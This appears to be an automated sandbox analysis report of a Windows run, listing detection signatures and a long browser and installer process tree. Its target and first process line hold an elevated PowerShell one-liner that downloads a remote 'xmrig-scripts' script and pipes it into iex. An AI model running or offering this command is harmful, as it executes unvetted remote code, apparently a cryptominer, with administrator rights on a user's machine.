Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system
  • submitted
    26/06/2024, 23:33

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Malware Config

Signatures

  • Downloads MZ/PE file
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 43 IoCs
  • Loads dropped DLL 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Checks system information in the registry 2 TTPs 18 IoCs

    System information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 17 IoCs
  • Modifies Internet Explorer settings 1 TTPs 14 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\LaunchWinApp.exe
    "C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
    1⤵
    • Access Token Manipulation: Create Process with Token
    PID:1640
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:3472
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:1428
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4232
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:652
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious use of AdjustPrivilegeToken
    PID:432
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Drops file in Windows directory
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2680
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3348
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.0.253263564\1666715509" -parentBuildID 20221007134813 -prefsHandle 1736 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b1bc83-3f1d-4686-8068-cb4024606cd8} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 1824 20cfe9ce158 gpu
        3⤵
          PID:4812
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.1.2105767407\1393510733" -parentBuildID 20221007134813 -prefsHandle 2168 -prefMapHandle 2156 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff2cd15-9b23-46a3-9cff-769ca4695bf4} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 2180 20cfe8fb358 socket
          3⤵
          • Checks processor information in registry
          PID:4952
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.2.1072239049\118926637" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d4b5d16-f731-455b-b64c-a9aeda37f31c} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3136 20c87311558 tab
          3⤵
            PID:1484
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.3.1333361495\869113507" -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3376 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07302cb8-e27d-49af-a573-06849357c768} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3408 20c877dab58 tab
            3⤵
              PID:2252
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.4.1818201270\1027860085" -childID 3 -isForBrowser -prefsHandle 4336 -prefMapHandle 4324 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5539895-a374-4540-97db-07a54d9f5c89} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3456 20c88383c58 tab
              3⤵
                PID:3452
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.5.1089039125\1913300989" -childID 4 -isForBrowser -prefsHandle 2624 -prefMapHandle 4832 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6a0e0-2593-43ae-827b-b70ebd43c0eb} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 4812 20c895e6558 tab
                3⤵
                  PID:208
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.6.901914592\1157740721" -childID 5 -isForBrowser -prefsHandle 5056 -prefMapHandle 5060 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a951b25-98a4-4879-94eb-9ff815ffedd9} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5048 20c8a226858 tab
                  3⤵
                    PID:4944
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.7.508253332\1059688177" -childID 6 -isForBrowser -prefsHandle 5240 -prefMapHandle 5244 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1b9deee-dadd-4bdc-9f4b-e0dee4e52a84} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5236 20c8a225058 tab
                    3⤵
                      PID:2972
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                  1⤵
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1452
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde1649778
                    2⤵
                      PID:1700
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:2
                      2⤵
                        PID:4104
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                        2⤵
                          PID:1432
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                          2⤵
                            PID:2404
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1
                            2⤵
                              PID:4208
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1
                              2⤵
                                PID:4520
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1
                                2⤵
                                  PID:2080
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                  2⤵
                                    PID:508
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                    2⤵
                                      PID:1120
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                      2⤵
                                        PID:1200
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                        2⤵
                                          PID:3452
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                          2⤵
                                            PID:1444
                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                          1⤵
                                            PID:1560
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                            1⤵
                                            • Enumerates system info in registry
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4880
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde1649778
                                              2⤵
                                                PID:4624
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:2
                                                2⤵
                                                  PID:3064
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                  2⤵
                                                    PID:3544
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                    2⤵
                                                      PID:696
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                      2⤵
                                                        PID:3252
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                        2⤵
                                                          PID:2356
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                          2⤵
                                                            PID:2604
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                            2⤵
                                                              PID:3048
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                              2⤵
                                                                PID:4796
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                2⤵
                                                                  PID:3440
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                  2⤵
                                                                    PID:4568
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                    2⤵
                                                                      PID:2736
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5180 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                      2⤵
                                                                        PID:3776
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3452 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                        2⤵
                                                                          PID:4080
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                          2⤵
                                                                            PID:3224
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3160 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                            2⤵
                                                                              PID:1092
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                              2⤵
                                                                                PID:3004
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                2⤵
                                                                                  PID:3012
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=812 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                  2⤵
                                                                                    PID:704
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4736 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2612
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5596 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                      2⤵
                                                                                        PID:1748
                                                                                      • C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
                                                                                        "C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        • Drops file in Program Files directory
                                                                                        • Enumerates system info in registry
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:1852
                                                                                        • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
                                                                                          MicrosoftEdgeWebview2Setup.exe /silent /install
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1360
                                                                                          • C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
                                                                                            4⤵
                                                                                            • Event Triggered Execution: Image File Execution Options Injection
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks system information in the registry
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4872
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies registry class
                                                                                              PID:200
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Modifies registry class
                                                                                              PID:4056
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                PID:3604
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                PID:1168
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                PID:4332
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks system information in the registry
                                                                                              PID:1400
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{25D76038-9631-41B7-9864-2A11D77D3FBF}" /silent
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:2832
                                                                                        • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
